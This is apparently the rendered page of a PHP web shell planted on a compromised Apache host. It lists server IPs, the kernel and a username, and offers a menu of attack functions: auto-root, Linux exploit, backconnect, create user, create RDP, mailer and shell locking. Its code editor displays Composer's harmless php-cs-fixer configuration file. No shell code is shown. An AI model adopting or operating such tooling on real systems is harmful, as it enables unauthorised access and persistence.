Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
composer /
composer /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
doc
[ DIR ]
drwxr-xr-x
res
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.editorconfig
155
B
-rw-r--r--
.gitattributes
833
B
-rw-r--r--
.php-cs-fixer.php
2.23
KB
-rw-r--r--
CHANGELOG.md
109.01
KB
-rw-r--r--
CODE_OF_CONDUCT.md
3.27
KB
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
PORTING_INFO
1.56
KB
-rw-r--r--
README.md
2.35
KB
-rw-r--r--
UPGRADE-2.0.md
10.31
KB
-rw-r--r--
composer.json
3.49
KB
-rw-r--r--
composer.lock
58.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .php-cs-fixer.php
<?php $header = <<<EOF This file is part of Composer. (c) Nils Adermann <naderman@naderman.de> Jordi Boggiano <j.boggiano@seld.be> For the full copyright and license information, please view the LICENSE file that was distributed with this source code. EOF; $finder = PhpCsFixer\Finder::create() ->files() ->in(__DIR__.'/src') ->in(__DIR__.'/tests') ->name('*.php') ->notPath('Fixtures') ; $config = new PhpCsFixer\Config(); return $config->setRules([ '@PSR2' => true, 'array_syntax' => array('syntax' => 'long'), 'binary_operator_spaces' => true, 'blank_line_before_statement' => array('statements' => array('declare', 'return')), 'cast_spaces' => array('space' => 'single'), 'header_comment' => array('header' => $header), 'include' => true, 'class_attributes_separation' => array('elements' => array('method' => 'one', 'trait_import' => 'none')), 'no_blank_lines_after_class_opening' => true, 'no_blank_lines_after_phpdoc' => true, 'no_empty_statement' => true, 'no_extra_blank_lines' => true, 'no_leading_namespace_whitespace' => true, 'no_trailing_comma_in_singleline_array' => true, 'no_whitespace_in_blank_line' => true, 'object_operator_without_whitespace' => true, //'phpdoc_align' => true, 'phpdoc_indent' => true, 'phpdoc_no_access' => true, 'phpdoc_no_package' => true, //'phpdoc_order' => true, 'phpdoc_scalar' => true, 'phpdoc_trim' => true, 'phpdoc_types' => true, 'psr_autoloading' => true, 'single_blank_line_before_namespace' => true, 'standardize_not_equals' => true, 'ternary_operator_spaces' => true, 'trailing_comma_in_multiline' => ['elements' => ['arrays']], 'unary_operator_spaces' => true, // imports 'no_unused_imports' => true, 'fully_qualified_strict_types' => true, 'single_line_after_imports' => true, //'global_namespace_import' => ['import_classes' => true], 'no_leading_import_slash' => true, 'single_import_per_statement' => true, ]) ->setUsingCache(true) ->setRiskyAllowed(true) ->setFinder($finder) ;
Close